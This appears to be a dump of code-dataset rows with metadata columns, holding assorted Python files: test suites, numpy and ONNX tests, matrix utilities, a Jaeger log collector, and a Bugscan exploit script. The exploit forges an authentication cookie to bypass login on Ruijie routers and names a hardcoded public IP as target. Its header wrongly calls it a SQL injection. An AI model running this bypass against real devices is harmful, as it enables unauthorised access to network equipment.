| 28.833333 | 83 | 0.670906 | 359 | 2,595 | 4.713092 | 0.398329 | 0.058511 | 0.042553 | 0.027187 | 0.017731 | 0 | 0 | 0 | 0 | 0 | 0 | 0.023923 | 0.194605 | 2,595 | 89 | 84 | 29.157303 | 0.785646 | 0.014258 | 0 | 0.028169 | 0 | 0 | 0.092404 | 0.008222 | 0 | 0 | 0 | 0 | 0 | 1 | 0.028169 | false | 0.014085 | 0.183099 | 0.014085 | 0.267606 | 0.028169 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df4c96ccb340b9ae5841e6add1a11590553d1c14 | 6,569 | py | Python | tests/module_definition/parameter_test.py | BjoernLange/C-Mock-Generator | 91f0e331abf54dc5b6706796c02341e23b2e06d7 | [
"MIT"
] | null | null | null | tests/module_definition/parameter_test.py | BjoernLange/C-Mock-Generator | 91f0e331abf54dc5b6706796c02341e23b2e06d7 | [
"MIT"
] | 3 | 2020-06-07T12:48:17.000Z | 2020-07-26T12:52:45.000Z | tests/module_definition/parameter_test.py | BjoernLange/C-Mock-Generator | 91f0e331abf54dc5b6706796c02341e23b2e06d7 | [
"MIT"
] | null | null | null | from typing import Optional
import pytest
from c_mock_generator.module_definition.exceptions import MockGeneratorError
from c_mock_generator.module_definition.parameter_documentation import \
ParameterDocumentation, ActiveAttributions
from c_mock_generator.module_definition.parameter import Parameter
from c_mock_generator.module_definition.parameter_kind import ParameterKind
from c_mock_generator.module_definition.type import SimpleType, PointerType
def create_parameter_documentation(
identifier: str, parameter_kind: Optional[str] = None,
fixed_length: Optional[int] = None, null_terminated: bool = False,
length_descriptor: Optional[str] = None):
attributions = ActiveAttributions()
if parameter_kind is not None:
attributions.add_attribution(parameter_kind)
if fixed_length is not None:
attributions.add_attribution('fixed-length={}'.format(fixed_length))
if null_terminated:
attributions.add_attribution('null-terminated')
if length_descriptor is not None:
attributions.add_attribution(
'length-descriptor={}'.format(length_descriptor))
return ParameterDocumentation(identifier, attributions)
def test_enrich_with_documentation_fails_on_impossible_combination():
# given:
parameter = Parameter('abc', 'def', SimpleType('int'))
parameter_documentation = create_parameter_documentation(
'abc', parameter_kind='out')
# when:
try:
parameter.enrich_with_documentation(parameter_documentation)
except MockGeneratorError:
return
assert False
def test_initial_kind_is_guessed():
# when:
parameter = Parameter('abc', 'def', PointerType('int', False, 1, False))
# then:
assert parameter.is_input
assert not parameter.is_not_input
assert parameter.is_output
def test_enrich_with_documentation_defaults():
# given:
parameter = Parameter('abc', 'def', SimpleType('int'))
parameter_documentation = create_parameter_documentation('abc')
# when:
parameter.enrich_with_documentation(parameter_documentation)
# then:
assert parameter.kind == ParameterKind.kind_in()
assert parameter.is_input
assert not parameter.is_not_input
assert not parameter.is_output
assert parameter.has_simple_type
assert not parameter.has_pointer_type
assert not parameter.is_single_element
assert not parameter.has_fixed_length
assert parameter.fixed_length is None
assert not parameter.is_null_terminated
assert not parameter.has_length_descriptor
assert parameter.length_descriptor is None
def test_enrich_with_documentation_sets_is_input():
# given:
parameter = Parameter('abc', 'def', PointerType('int', False, 1, False))
parameter_documentation = create_parameter_documentation(
'abc', parameter_kind='out')
# when:
parameter.enrich_with_documentation(parameter_documentation)
# then:
assert parameter.kind == ParameterKind.kind_out()
assert not parameter.is_input
assert parameter.is_not_input
def test_enrich_with_documentation_sets_fixed_length():
# given:
parameter = Parameter('abc', 'def', PointerType('int', False, 1, False))
parameter_documentation = create_parameter_documentation('abc',
fixed_length=4)
# when:
parameter.enrich_with_documentation(parameter_documentation)
# then:
assert parameter.kind == ParameterKind.kind_in_out()
assert parameter.fixed_length == 4
def test_enrich_with_documentation_defaults_for_pointers():
# given:
parameter = Parameter('abc', 'def', PointerType('int', False, 1, False))
documentation = create_parameter_documentation('abc')
# when:
parameter.enrich_with_documentation(documentation)
# then:
assert not parameter.has_simple_type
assert parameter.has_pointer_type
assert parameter.is_single_element
assert not parameter.has_fixed_length
assert parameter.fixed_length is None
assert not parameter.is_null_terminated
assert not parameter.has_length_descriptor
assert parameter.length_descriptor is None
def test_enrich_with_documentation_sets_is_null_terminated():
# given:
parameter = Parameter('abc', 'def', PointerType('int', False, 1, False))
documentation = create_parameter_documentation('abc', null_terminated=True)
# when:
parameter.enrich_with_documentation(documentation)
# then:
assert parameter.is_null_terminated
def test_enrich_with_documentation_sets_length_descriptor():
# given:
parameter = Parameter('abc', 'def', PointerType('int', False, 1, False))
documentation = create_parameter_documentation(
'abc', length_descriptor='size')
# when:
parameter.enrich_with_documentation(documentation)
# then:
assert parameter.has_length_descriptor
assert parameter.length_descriptor == 'size'
def test_char_pointer_type_is_reported_as_c_string():
# when:
parameter = Parameter('abc', 'def', PointerType('char', False, 1, False))
# then:
assert parameter.has_c_string_type
assert not parameter.has_utf8_string_type
assert not parameter.has_no_string_type
def test_wchar_pointer_type_is_reported_as_utf8_string():
# when:
parameter = Parameter('abc', 'def',
PointerType('wchar_t', False, 1, False))
# then:
assert not parameter.has_c_string_type
assert parameter.has_utf8_string_type
assert not parameter.has_no_string_type
@pytest.mark.parametrize('c_type', [
SimpleType('int'),
PointerType('int', False, 1, False),
PointerType('char', False, 2, False),
])
def test_types_not_reported_as_c_string(c_type):
# when:
parameter = Parameter('abc', 'def', c_type)
# then:
assert not parameter.has_c_string_type
assert not parameter.has_utf8_string_type
assert parameter.has_no_string_type
def test_from_parameter_list_raises_error_when_parameter_list_is_empty():
# when:
try:
Parameter.from_parameter_list('', 'abc')
except MockGeneratorError:
return
assert False
@pytest.mark.parametrize(('c_type', 'expected_type'), [
(SimpleType('int'), SimpleType('int')),
(PointerType('int', True, 1, True), PointerType('int', True, 1, False)),
])
def test_struct_type(c_type, expected_type):
# given:
parameter = Parameter('abc', 'def', c_type)
# when:
struct_type = parameter.struct_type
# then:
assert struct_type == expected_type
| 31.581731 | 79 | 0.732379 | 763 | 6,569 | 5.982962 | 0.121887 | 0.069003 | 0.074918 | 0.063089 | 0.717415 | 0.632202 | 0.531873 | 0.475575 | 0.459584 | 0.40701 | 0 | 0.00334 | 0.179479 | 6,569 | 207 | 80 | 31.7343 | 0.843599 | 0.030294 | 0 | 0.401575 | 0 | 0 | 0.038188 | 0 | 0 | 0 | 0 | 0 | 0.338583 | 1 | 0.110236 | false | 0 | 0.055118 | 0 | 0.188976 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df4d2925d7d80db583bc0844ba5d1903f8ecf247 | 959 | py | Python | ex17.py | munyamunya/python-excercise | afb217e4cac74c98a41d3c255acb28a61941ee9d | [
"MIT"
] | null | null | null | ex17.py | munyamunya/python-excercise | afb217e4cac74c98a41d3c255acb28a61941ee9d | [
"MIT"
] | null | null | null | ex17.py | munyamunya/python-excercise | afb217e4cac74c98a41d3c255acb28a61941ee9d | [
"MIT"
] | null | null | null | # 練習17 借金を返済しよう (ex17.py)
# 借金をして月々、定額を返済していくと借金はどうなっていくのかを調べるプログラムを作成しよう。
# 借金の金額と、利息の年利率(%)、月々の返済額を入力すると、毎月、借金がなくなるまで月数と借金の金額を表示するものとする。
# 月々の借金は、借金の利息年利率/12(月割り)分増加するが、返済分だけ減る。
# 実行結果
# 借金> 100000
# 年利率(%)> 14.0
# 返済額> 20000
# 1月: 返済額 20000 円 残り 81166 円
# 2月: 返済額 20000 円 残り 62113 円
# 3月: 返済額 20000 円 残り 42838 円
# 4月: 返済額 20000 円 残り 23338 円
# 5月: 返済額 20000 円 残り 3610 円
# 6月: 返済額 3652 円 これで完済。 返済総額: 103652 円
# Debt > 100000
# Annual interest rate (%) > 14.0
# Repayment > 20000
dept = float(input("借金> "))
annual_interest_rate = float(input("年利率(%)> "))
repayment = int(input("返済額> "))
month = 1
while (dept > 0) :
if( dept - repayment > 0 ) :
dept = dept + (dept * annual_interest_rate/12/100) - repayment
print("{}月: 返済額 {} 円 残り {} 円".format(month % 13, repayment, dept ) )
month = month + 1
else:
print("{}月: 返済額 {} 円 これで完済。 返済総額: {} 円".format(month % 13, dept, repayment*(month-1) + dept ) )
break
| 27.4 | 103 | 0.625652 | 140 | 959 | 4.257143 | 0.442857 | 0.080537 | 0.075503 | 0.092282 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.151272 | 0.221064 | 959 | 34 | 104 | 28.205882 | 0.646586 | 0.466111 | 0 | 0 | 0 | 0 | 0.139959 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.166667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df5034fa78cbb9988aa4d1002234629ac70f8650 | 1,722 | py | Python | onnx/test/tools_test.py | cnheider/onnx | 8e9c7d57f7c5aa6f6eb7ee7abb0ba2a243781933 | [
"MIT"
] | 137 | 2020-04-28T12:28:32.000Z | 2022-03-18T10:48:25.000Z | onnx/test/tools_test.py | cnheider/onnx | 8e9c7d57f7c5aa6f6eb7ee7abb0ba2a243781933 | [
"MIT"
] | 24 | 2020-05-06T08:06:42.000Z | 2021-12-31T07:46:13.000Z | onnx/test/tools_test.py | cnheider/onnx | 8e9c7d57f7c5aa6f6eb7ee7abb0ba2a243781933 | [
"MIT"
] | 24 | 2020-05-06T11:43:22.000Z | 2022-03-18T10:50:35.000Z | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import unittest
import onnx
from onnx.tools import update_model_dims
from onnx import helper, TensorProto
class TestToolsFunctions(unittest.TestCase):
def test_update_inputs_outputs_dim(self): # type: () -> None
node_def = helper.make_node(
"Conv",
inputs=['x', 'W'],
outputs=['y'],
kernel_shape=[3, 3],
strides=[2, 2],
)
graph_def = helper.make_graph(
[node_def],
'test',
[helper.make_tensor_value_info('x', TensorProto.FLOAT, [1, 1, 5, 5]),
helper.make_tensor_value_info('W', TensorProto.FLOAT, [1, 1, 3, 3])],
[helper.make_tensor_value_info('y', TensorProto.FLOAT, [1, 1, 2, 2])]
)
model_def = helper.make_model(graph_def, producer_name='test')
updated_def = update_model_dims.update_inputs_outputs_dims(
model_def,
{
"x": [1, 1, 'x1', -1],
"W": [1, 1, 3, 3],
},
{
"y": [1, 1, -1, -1],
})
onnx.checker.check_model(updated_def)
self.assertEqual(updated_def.graph.input[0].type.tensor_type.shape.dim[2].dim_param, 'x1')
self.assertEqual(updated_def.graph.input[0].type.tensor_type.shape.dim[3].dim_param, 'x_3')
self.assertEqual(updated_def.graph.output[0].type.tensor_type.shape.dim[2].dim_param, 'y_2')
self.assertEqual(updated_def.graph.output[0].type.tensor_type.shape.dim[3].dim_param, 'y_3')
if __name__ == '__main__':
unittest.main()
| 36.638298 | 100 | 0.606272 | 224 | 1,722 | 4.321429 | 0.263393 | 0.016529 | 0.066116 | 0.103306 | 0.356405 | 0.278926 | 0.278926 | 0.278926 | 0.278926 | 0.241736 | 0 | 0.031348 | 0.259001 | 1,722 | 46 | 101 | 37.434783 | 0.727273 | 0.009292 | 0 | 0 | 0 | 0 | 0.024648 | 0 | 0 | 0 | 0 | 0 | 0.097561 | 1 | 0.02439 | false | 0 | 0.195122 | 0 | 0.243902 | 0.02439 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df50c3432b15ea04d712fd237733f2cc20205308 | 2,551 | py | Python | StripeCaller/caller/mat_ops.py | seanpatrickmoran/StripeCaller | 1a6de26cd20570087f18da09228cf714eae81f2d | [
"MIT"
] | null | null | null | StripeCaller/caller/mat_ops.py | seanpatrickmoran/StripeCaller | 1a6de26cd20570087f18da09228cf714eae81f2d | [
"MIT"
] | null | null | null | StripeCaller/caller/mat_ops.py | seanpatrickmoran/StripeCaller | 1a6de26cd20570087f18da09228cf714eae81f2d | [
"MIT"
] | null | null | null | import numpy as np
import scipy.sparse as sp
def subsetNpMatrix(matrix, row_bounds, column_bounds):
rows = np.array([x for x in range(row_bounds[0], row_bounds[1]) if 0 <= int(x) < matrix.shape[0]])
cols = np.array([y for y in range(column_bounds[0], column_bounds[1]) if 0 <= int(y) < matrix.shape[1]])
if len(rows)==0 or len(cols)==0:
return np.empty(0)
subset = (matrix.ravel()[(cols + (rows * matrix.shape[1]).reshape((-1, 1))).ravel()]).reshape(rows.size, cols.size)
return subset
def strata2triu(strata):
mat = np.zeros((len(strata[0]), len(strata[0])))
for i in range(len(strata)):
for j in range(len(strata[i])):
mat[j, j + i] = strata[i][j]
return mat
def strata2horizontal(strata):
hmat = np.zeros((len(strata[0]), len(strata)))
for i in range(len(strata)):
hmat[:len(strata[i]), i] = strata[i]
return hmat
def strata2vertical(strata):
vmat = np.zeros((len(strata[0]), len(strata)))
for i in range(len(strata)):
vmat[i:, i] = strata[i]
return vmat
def blank_diagonal2(matr, strata = False):
"""
in: edgelist, strata (n entries off main diagonal to zero)
out:matrix with n blanked diagonal
"""
# int_shape = (int(max(matr[:,1])+1), int(max(matr[:,1])+1))
# coo = sp.coo_matrix((matr[:, 2], (matr[:, 0], matr[:, 1])), shape=int_shape, dtype=matr.dtype)
# csr = coo.tocsr()
# csr_org = csr.copy()
coo = sp.coo_matrix(matr)
csr = coo.tocsr()
lil = csr.tolil()
for i in range(lil.shape[0]):
lil[i:i+strata+1,i:i+strata+1] = 0
csr = lil.tocsr()
return csr
def blank_diagonal(mat, nstrata=0):
return np.triu(mat, nstrata) if nstrata > 0 else mat
def blank_diagonal_sparse_from_strata(strata, nstrata=0):
"""
# >>> strata = [np.array([1, 2, 3, 4]), np.array([5, 6, 7]), np.array([8, 9])]
# >>> blank_diagonal_sparse_from_strata(strata, nstrata=1)
"""
size = len(strata[0])
padded_strata = [
np.concatenate([np.zeros(shape=(i,)), strata[i]]) for i in range(len(strata))
]
for i in range(nstrata):
padded_strata[i] = np.zeros((size,))
diags = np.arange(len(strata))
return sp.spdiags(padded_strata, diags, size, size, format='csr')
if __name__ == '__main__':
strata = [np.array([1, 2, 3, 4]), np.array([5, 6, 7]), np.array([8, 9])]
mat = blank_diagonal_sparse_from_strata(strata, nstrata=1)
print(mat.toarray())
# [[0. 5. 8. 0.]
# [0. 0. 6. 9.]
# [0. 0. 0. 7.]
# [0. 0. 0. 0.]]
| 30.73494 | 119 | 0.592317 | 405 | 2,551 | 3.641975 | 0.219753 | 0.085424 | 0.024407 | 0.044746 | 0.330847 | 0.252203 | 0.24678 | 0.169492 | 0.111186 | 0.111186 | 0 | 0.036555 | 0.21717 | 2,551 | 82 | 120 | 31.109756 | 0.702053 | 0.196786 | 0 | 0.0625 | 0 | 0 | 0.005497 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.145833 | false | 0 | 0.041667 | 0.020833 | 0.354167 | 0.020833 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df56b842f640e25a4f3079105b09af9465ab1377 | 2,388 | py | Python | toolchain/plugins/measure_jaeger.py | the-redback/pptam-tool | 52b9cbd591f82d9ecc68dea1bbeac33701f08a21 | [
"MIT"
] | null | null | null | toolchain/plugins/measure_jaeger.py | the-redback/pptam-tool | 52b9cbd591f82d9ecc68dea1bbeac33701f08a21 | [
"MIT"
] | null | null | null | toolchain/plugins/measure_jaeger.py | the-redback/pptam-tool | 52b9cbd591f82d9ecc68dea1bbeac33701f08a21 | [
"MIT"
] | null | null | null | import logging
import requests
import json
import os
import time
def after(current_configuration, output, test_id):
jaeger_host = current_configuration["jaeger_host_url"]
jaeger_services = current_configuration["jaeger_services"].split(" ")
service_to_test = current_configuration["jaeger_test_if_service_is_present"]
all_services = []
for _ in range(60):
try:
session = requests.Session()
session.headers.update({'accept': 'application/json'})
session.headers.update({'content-type': 'application/json'})
logging.info(f"Contacting Jaeger host {jaeger_host}/api/services")
service_request = session.get(f"{jaeger_host}/api/services")
all_services = service_request.json()["data"]
if all_services is None:
logging.critical(f"Cannot determine Jaeger services.")
else:
if (service_to_test != "") and not (service_to_test in all_services):
logging.critical(f"Service {service_to_test} is not in the list of services.")
else:
break
except Exception as e:
logging.critical(f"Exception while determining Jaeger services: {e}")
time.sleep(60)
if (all_services != None) and ((service_to_test == "") or (service_to_test in all_services)):
for service in all_services:
if ("all" in jaeger_services) or (service in jaeger_services):
if f"!{service}" in jaeger_services:
logging.debug(f"Skipping service {service}.")
else:
file_to_write = os.path.join(output, f"jaeger_{service}.log")
try:
logging.info(f"Wrinting Jaeger data for service {service}.")
with open(file_to_write, "a") as f:
request = session.get(f"{jaeger_host}/api/traces?service=" + service)
data = json.loads(request.content)["data"]
f.write(json.dumps(data, indent=2))
except Exception as e2:
logging.critical(f"Exception while reading Jaeger data for service {service}: {e2}")
else:
logging.critical(f"Cannot store Jaeger service data.") | 44.222222 | 111 | 0.581658 | 267 | 2,388 | 5.022472 | 0.303371 | 0.07308 | 0.058166 | 0.03132 | 0.170022 | 0.085011 | 0.046234 | 0 | 0 | 0 | 0 | 0.004302 | 0.318677 | 2,388 | 54 | 112 | 44.222222 | 0.819914 | 0 | 0 | 0.133333 | 0 | 0 | 0.237756 | 0.049393 | 0 | 0 | 0 | 0 | 0 | 1 | 0.022222 | false | 0 | 0.111111 | 0 | 0.133333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df59e95731903dc924bbf2b74288527f5c9aeccf | 984 | py | Python | utils/queue_viewer.py | VDL-PRISM/dylos | 16bfcc9925d4e18793b4b004bd3ba55d243de450 | [
"Apache-2.0"
] | null | null | null | utils/queue_viewer.py | VDL-PRISM/dylos | 16bfcc9925d4e18793b4b004bd3ba55d243de450 | [
"Apache-2.0"
] | 11 | 2017-12-07T22:45:41.000Z | 2018-01-26T20:44:21.000Z | utils/queue_viewer.py | VDL-PRISM/dylos | 16bfcc9925d4e18793b4b004bd3ba55d243de450 | [
"Apache-2.0"
] | null | null | null | import argparse
from datetime import datetime
import msgpack
from persistent_queue import PersistentQueue
import pytz
from tabulate import tabulate
parser = argparse.ArgumentParser(description='View data from a queue')
parser.add_argument('queue')
parser.add_argument('start', type=int)
parser.add_argument('end', type=int)
args = parser.parse_args()
file = args.queue
start = args.start
end = args.end
queue = PersistentQueue(file,
dumps=msgpack.packb,
loads=msgpack.unpackb)
if end == 0:
data = queue.peek(len(queue))
else:
data = queue.peek(end)
data = data[start:]
data = [(humidity, large, datetime.utcfromtimestamp(sampletime).replace(tzinfo=pytz.utc), sequence, small, temperature)
for humidity, large, sampletime, sequence, small, temperature in data]
table = tabulate(data, headers=["Humidity", "Large", "Sample Time",
"Sequence", "Small", "Temperature"])
print(table)
| 26.594595 | 119 | 0.688008 | 117 | 984 | 5.74359 | 0.435897 | 0.040179 | 0.075893 | 0.065476 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001267 | 0.198171 | 984 | 36 | 120 | 27.333333 | 0.850444 | 0 | 0 | 0 | 0 | 0 | 0.08435 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.222222 | 0 | 0.222222 | 0.037037 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df59f4730e20867d4ca7c619bfd2bad305c5e7b7 | 4,002 | py | Python | Python_OCR_JE/venv/Lib/site-packages/numpy/typing/tests/data/pass/fromnumeric.py | JE-Chen/je_old_repo | a8b2f1ac2eec25758bd15b71c64b59b27e0bcda5 | [
"MIT"
] | 1 | 2022-01-08T12:30:44.000Z | 2022-01-08T12:30:44.000Z | Python_OCR_JE/venv/Lib/site-packages/numpy/typing/tests/data/pass/fromnumeric.py | JE-Chen/je_old_repo | a8b2f1ac2eec25758bd15b71c64b59b27e0bcda5 | [
"MIT"
] | null | null | null | Python_OCR_JE/venv/Lib/site-packages/numpy/typing/tests/data/pass/fromnumeric.py | JE-Chen/je_old_repo | a8b2f1ac2eec25758bd15b71c64b59b27e0bcda5 | [
"MIT"
] | 1 | 2021-04-26T22:41:56.000Z | 2021-04-26T22:41:56.000Z | """Tests for :mod:`numpy.core.fromnumeric`."""
import numpy as np
A = np.array(True, ndmin=2, dtype=bool)
B = np.array(1.0, ndmin=2, dtype=np.float32)
A.setflags(write=False)
B.setflags(write=False)
a = np.bool_(True)
b = np.float32(1.0)
c = 1.0
d = np.array(1.0, dtype=np.float32) # writeable
np.take(a, 0)
np.take(b, 0)
np.take(c, 0)
np.take(A, 0)
np.take(B, 0)
np.take(A, [0])
np.take(B, [0])
np.reshape(a, 1)
np.reshape(b, 1)
np.reshape(c, 1)
np.reshape(A, 1)
np.reshape(B, 1)
np.choose(a, [True, True])
np.choose(A, [1.0, 1.0])
np.repeat(a, 1)
np.repeat(b, 1)
np.repeat(c, 1)
np.repeat(A, 1)
np.repeat(B, 1)
np.swapaxes(A, 0, 0)
np.swapaxes(B, 0, 0)
np.transpose(a)
np.transpose(b)
np.transpose(c)
np.transpose(A)
np.transpose(B)
np.partition(a, 0, axis=None)
np.partition(b, 0, axis=None)
np.partition(c, 0, axis=None)
np.partition(A, 0)
np.partition(B, 0)
np.argpartition(a, 0)
np.argpartition(b, 0)
np.argpartition(c, 0)
np.argpartition(A, 0)
np.argpartition(B, 0)
np.sort(A, 0)
np.sort(B, 0)
np.argsort(A, 0)
np.argsort(B, 0)
np.argmax(A)
np.argmax(B)
np.argmax(A, axis=0)
np.argmax(B, axis=0)
np.argmin(A)
np.argmin(B)
np.argmin(A, axis=0)
np.argmin(B, axis=0)
np.searchsorted(A[0], 0)
np.searchsorted(B[0], 0)
np.searchsorted(A[0], [0])
np.searchsorted(B[0], [0])
np.resize(a, (5, 5))
np.resize(b, (5, 5))
np.resize(c, (5, 5))
np.resize(A, (5, 5))
np.resize(B, (5, 5))
np.squeeze(a)
np.squeeze(b)
np.squeeze(c)
np.squeeze(A)
np.squeeze(B)
np.diagonal(A)
np.diagonal(B)
np.trace(A)
np.trace(B)
np.ravel(a)
np.ravel(b)
np.ravel(c)
np.ravel(A)
np.ravel(B)
np.nonzero(A)
np.nonzero(B)
np.shape(a)
np.shape(b)
np.shape(c)
np.shape(A)
np.shape(B)
np.compress([True], a)
np.compress([True], b)
np.compress([True], c)
np.compress([True], A)
np.compress([True], B)
np.clip(a, 0, 1.0)
np.clip(b, -1, 1)
np.clip(a, 0, None)
np.clip(b, None, 1)
np.clip(c, 0, 1)
np.clip(A, 0, 1)
np.clip(B, 0, 1)
np.clip(B, [0, 1], [1, 2])
np.sum(a)
np.sum(b)
np.sum(c)
np.sum(A)
np.sum(B)
np.sum(A, axis=0)
np.sum(B, axis=0)
np.all(a)
np.all(b)
np.all(c)
np.all(A)
np.all(B)
np.all(A, axis=0)
np.all(B, axis=0)
np.all(A, keepdims=True)
np.all(B, keepdims=True)
np.any(a)
np.any(b)
np.any(c)
np.any(A)
np.any(B)
np.any(A, axis=0)
np.any(B, axis=0)
np.any(A, keepdims=True)
np.any(B, keepdims=True)
np.cumsum(a)
np.cumsum(b)
np.cumsum(c)
np.cumsum(A)
np.cumsum(B)
np.ptp(b)
np.ptp(c)
np.ptp(B)
np.ptp(B, axis=0)
np.ptp(B, keepdims=True)
np.amax(a)
np.amax(b)
np.amax(c)
np.amax(A)
np.amax(B)
np.amax(A, axis=0)
np.amax(B, axis=0)
np.amax(A, keepdims=True)
np.amax(B, keepdims=True)
np.amin(a)
np.amin(b)
np.amin(c)
np.amin(A)
np.amin(B)
np.amin(A, axis=0)
np.amin(B, axis=0)
np.amin(A, keepdims=True)
np.amin(B, keepdims=True)
np.prod(a)
np.prod(b)
np.prod(c)
np.prod(A)
np.prod(B)
np.prod(a, dtype=None)
np.prod(A, dtype=None)
np.prod(A, axis=0)
np.prod(B, axis=0)
np.prod(A, keepdims=True)
np.prod(B, keepdims=True)
np.prod(b, out=d)
np.prod(B, out=d)
np.cumprod(a)
np.cumprod(b)
np.cumprod(c)
np.cumprod(A)
np.cumprod(B)
np.ndim(a)
np.ndim(b)
np.ndim(c)
np.ndim(A)
np.ndim(B)
np.size(a)
np.size(b)
np.size(c)
np.size(A)
np.size(B)
np.around(a)
np.around(b)
np.around(c)
np.around(A)
np.around(B)
np.mean(a)
np.mean(b)
np.mean(c)
np.mean(A)
np.mean(B)
np.mean(A, axis=0)
np.mean(B, axis=0)
np.mean(A, keepdims=True)
np.mean(B, keepdims=True)
np.mean(b, out=d)
np.mean(B, out=d)
np.std(a)
np.std(b)
np.std(c)
np.std(A)
np.std(B)
np.std(A, axis=0)
np.std(B, axis=0)
np.std(A, keepdims=True)
np.std(B, keepdims=True)
np.std(b, out=d)
np.std(B, out=d)
np.var(a)
np.var(b)
np.var(c)
np.var(A)
np.var(B)
np.var(A, axis=0)
np.var(B, axis=0)
np.var(A, keepdims=True)
np.var(B, keepdims=True)
np.var(b, out=d)
np.var(B, out=d)
| 15.333333 | 49 | 0.601949 | 876 | 4,002 | 2.748858 | 0.077626 | 0.061047 | 0.06686 | 0.039867 | 0.608804 | 0.501246 | 0.467193 | 0.31603 | 0.165282 | 0.101329 | 0 | 0.033954 | 0.168416 | 4,002 | 260 | 50 | 15.392308 | 0.689603 | 0.012744 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.004566 | 0 | 0.004566 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df5b982315dc9d3757badb58ec19ad64ecbb9cf6 | 871 | py | Python | Bugscan_exploits-master/exp_list/exp-1799.py | csadsl/poc_exp | e3146262e7403f19f49ee2db56338fa3f8e119c9 | [
"MIT"
] | 11 | 2020-05-30T13:53:49.000Z | 2021-03-17T03:20:59.000Z | Bugscan_exploits-master/exp_list/exp-1799.py | csadsl/poc_exp | e3146262e7403f19f49ee2db56338fa3f8e119c9 | [
"MIT"
] | 6 | 2020-05-13T03:25:18.000Z | 2020-07-21T06:24:16.000Z | Bugscan_exploits-master/exp_list/exp-1799.py | csadsl/poc_exp | e3146262e7403f19f49ee2db56338fa3f8e119c9 | [
"MIT"
] | 6 | 2020-05-30T13:53:51.000Z | 2020-12-01T21:44:26.000Z | #!/usr/bin/python
#-*- encoding:utf-8 -*-
#title:workyi_Talent system SQL injection
#author: xx00
#ref: http://www.wooyun.org/bugs/wooyun-2010-0148657
import urlparse
def assign(service, arg):
if service == 'ruijie_router':
arr = urlparse.urlparse(arg)
return True, '%s://%s/' % (arr.scheme, arr.netloc)
def audit(arg):
url = arg + 'stability.htm'
cookie = 'currentURL=index; auth=bWFuYWdlcjptYW5hZ2Vy; user=manager; c_name='
code, head, res, errcode, _ = curl.curl2(url,cookie=cookie,proxy=('127.0.0.1',8080))
if code == 200 and 'A_INTFEMPTY' in res and 'selectInterface' in res:
security_hole('Cookie deception:http://www.wooyun.org/bugs/wooyun-2010-0148657 cookie:%s'%cookie)
if __name__ == '__main__':
from dummy import *
audit(assign('ruijie_router', 'http://116.113.16.146/')[1]) | 32.259259 | 106 | 0.652124 | 119 | 871 | 4.647059 | 0.647059 | 0.025316 | 0.047016 | 0.057866 | 0.133816 | 0.133816 | 0.133816 | 0.133816 | 0 | 0 | 0 | 0.074543 | 0.183697 | 871 | 27 | 107 | 32.259259 | 0.703235 | 0.161883 | 0 | 0 | 0 | 0.071429 | 0.358571 | 0.037143 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.142857 | 0 | 0.357143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
